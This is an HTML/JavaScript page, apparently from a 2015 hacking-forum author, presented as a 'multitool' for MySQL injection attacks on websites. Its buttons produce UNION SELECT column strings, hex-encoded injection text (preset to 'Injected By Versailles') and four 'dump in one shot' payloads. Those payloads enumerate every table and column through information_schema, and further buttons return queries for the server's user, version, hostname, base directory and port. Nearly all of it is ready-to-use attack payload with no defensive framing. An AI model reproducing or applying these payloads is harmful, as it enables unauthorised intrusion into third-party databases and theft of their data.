Source Code Priv48 ToolSQL.html

<html>
<head>
<title>Priv48 Multytool SQL</title>
<meta charset="utf-8">

<script type="text/javascript">

// CheatSheet Dios Collection Pakage
// Coded By Versailles
// FB : facebook.com/thever.sevenfoldism
// Thanks for Sec7or Team - Securityidiots - Hackforum - and all
// Dont Change Copyright

function d2h(d) {return d.toString(16);}
function Str2Hex() {
var tmp = document.getElementById('str').value;
var str = '';
for (var i=0; i<tmp.length; i++) {
c = tmp.charCodeAt(i);
str += d2h(c) + ''; }
document.getElementById('hex').value = '0x' + str; }

function kolom() {

var columns = prompt( "Total Columns [./Versailles]", "48" );
    columns = Math.min(1000, parseInt( columns ));
    var colArray = new Array();
    for ( var i = 0 ; i < columns ; i++ ) {
      colArray.push( i+1 );
    }
    var kolom = "+UNION+SELECT+" + colArray.join( ',' ); document.getElementById('kol').value = kolom;
  }

function dios1(){
var dios1 = '(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)';
document.getElementById('dios').value = dios1;
}

function dios2(){
var dios2 = '(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))';
document.getElementById('dios').value = dios2;
}

function dios3(){
var dios3 = 'make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)';
document.getElementById('dios').value = dios3;
}

function dios4(){
var dios4 = '(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))';
document.getElementById('dios').value = dios4;
}

function version1(){
var v1 = 'version()';
document.getElementById('dios').value = v1;
}

function version2(){
var v2 = '@@version';
document.getElementById('dios').value = v2;
}

function version3(){
var v3 = '@@GLOBAL.VERSION';
document.getElementById('dios').value = v3;
}

function user1(){
var u1 = 'user()';
document.getElementById('dios').value = u1;
}

function user2(){
var u2 = 'CURRENT_USER()';
document.getElementById('dios').value = u2;
}

function user3(){
var u3 = 'SYSTEM_USER()';
document.getElementById('dios').value = u3;
}

function user4(){
var u4 = 'SESSION_USER()';
document.getElementById('dios').value = u4;
}

function user5(){
var u5 = 'SUBSTRING_INDEX(USER(),0x40,1)';
document.getElementById('dios').value = u5;
}

function user6(){
var u6 = '(SELECT+CONCAT(USER)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
document.getElementById('dios').value = u6;
}

function db1(){
var d1 = 'DATABASE()';
document.getElementById('dios').value = d1;
}

function db2(){
var d2 = 'SCHEMA()';
document.getElementById('dios').value = d2;
}

function db3(){
var d3 = '(SELECT+CONCAT(DB)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
document.getElementById('dios').value = d3;
}

function o1(){
var o1 = '@@HOSTNAME';
document.getElementById('dios').value = o1;
}

function o2(){
var o2 = '@@VERSION_COMPILE_MACHINE';
document.getElementById('dios').value = o2;
}

function o3(){
var o3 = '@@VERSION_COMPILE_OS';
document.getElementById('dios').value = o3;
}

function o4(){
var o4 = '@@BASEDIR';
document.getElementById('dios').value = o4;
}

function o5(){
var o5 = '@@HAVE_OPENSSL';
document.getElementById('dios').value = o5;
}

function o6(){
var o6 = '@@HAVE_SYMLINK';
document.getElementById('dios').value = o6;
}

function o7(){
var o7 = '@@PORT';
document.getElementById('dios').value = o7;
}

function o8(){
var o8 = '@@SOCKET';
document.getElementById('dios').value = o8;
}


</script>
</head>
<center>
<h2>MyMultytools</h2>
<body>============ String To Hex ============ <br>
<textarea id="str" rows="5" cols="40"><font color=red>Injected By Versailles</font></textarea>
 <br>
<button onclick="Str2Hex()">Convert</button>
<br>
<textarea id="hex" rows="5" cols="40">
</textarea><br>

======== GENERATE COLUMN ==========<br>
<button onclick="kolom()"> Generate Column </button>


<br>
<textarea id="kol" rows="5" cols="40">
</textarea>
<br>
 ======= :: DUMP IN ONE SHOOT :: =======<br>
<button onclick="dios1()">Dios 1</button>
<button onclick="dios2()">Dios 2</button>
<button onclick="dios3()">Dios 3</button>
<button onclick="dios4()">Dios 4</button><br>
========= SYSTEM VARIABLES =========<br>
:: VERSION ::<br>
<button onclick="version1()">Version 1</button>
<button onclick="version2()">Version 2</button>
<button onclick="version3()">Version 3</button><br>
:: USER :: <br>
<button onclick="user1()">User 1</button>
<button onclick="user2()">User 2</button>
<button onclick="user3()">User 3</button><br>
<button onclick="user4()">User 4</button>
<button onclick="user5()">User 5</button>
<button onclick="user6()">User 6</button><br>
:: DATABASE ::<br>
<button onclick="db1()">Database 1</button>
<button onclick="db2()">Database 2</button>
<button onclick="db3()">Database 3</button><BR>
:: OTHER ::<br>
<button onclick="o1()"> @@HOSTNAME </button>
<button onclick="o2()"> @@VERSION_COMPILE_MACHINE </button><br>
<button onclick="o3()"> @@VERSION_COMPILE_OS </button>
<button onclick="o4()"> @@BASEDIR </button><br>
<button onclick="o5()"> @@HAVE_OPENSSL </button>
<button onclick="o6()"> @@HAVE_SYMLINK </button><br>
<button onclick="o7()"> @@PORT </button>
<button onclick="o8()"> @@SOCKET </button>


<br>
<textarea id="dios" rows="5" cols="40" placeholder="Output">
</textarea>
<br>
:: Unescape ::
<script language="javascript">
      var encN=1;
      function decodeTxt(s){
      var s1=unescape(s.substr(0,s.length-1));
      var t='';
      for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
      return unescape(t);
      }

      function encodeTxt(s){
      s=escape(s);
      var ta=new Array();
      for(i=0;i<s.length;i++)ta[i]=s.charCodeAt(i)+encN;
      return ""+escape(eval("String.fromCharCode("+ta+")"))+encN;
      }

      function escapeTxt(os){
      var ns='';
      var t;
      var chr='';
      var cc='';
      var tn='';
      for(i=0;i<256;i++){
      tn=i.toString(16);
      if(tn.length<2)tn="0"+tn;
      cc+=tn;
      chr+=unescape('%'+tn);
      }
      cc=cc.toUpperCase();
      os.replace(String.fromCharCode(13)+'',"%13");
      for(q=0;q<os.length;q++){
      t=os.substr(q,1);
      for(i=0;i<chr.length;i++){
      if(t==chr.substr(i,1)){
      t=t.replace(chr.substr(i,1),"%"+cc.substr(i*2,2));
      i=chr.length;
      }}
      ns+=t;
      }
      return ns;
      }
      function unescapeTxt(s){
      return unescape(s);
      }
      function wF(s){
      document.write(decodeTxt(s));
      }
    </script>
        <form name="fA">
          <textarea id="f1" cols="40" rows="5" wrap="off" placeholder="source"></textarea><br>

<input value="Encode" onclick="document.fA.c1.value=escapeTxt(document.fA.f1.value)" type="button" width="50%"> &nbsp; &nbsp;
          <input value="Decode" onclick="document.fA.f1.value=unescapeTxt(document.fA.c1.value)" type="button"><br>

          <textarea id="c1" cols="40" rows="5" placeholder="Decode"></textarea><br>


</script>
<br>
&copy; 2015 | Coded By <a href=https://facebook.com/thever.sevenfoldism>Versailles</a>

</body>
</html>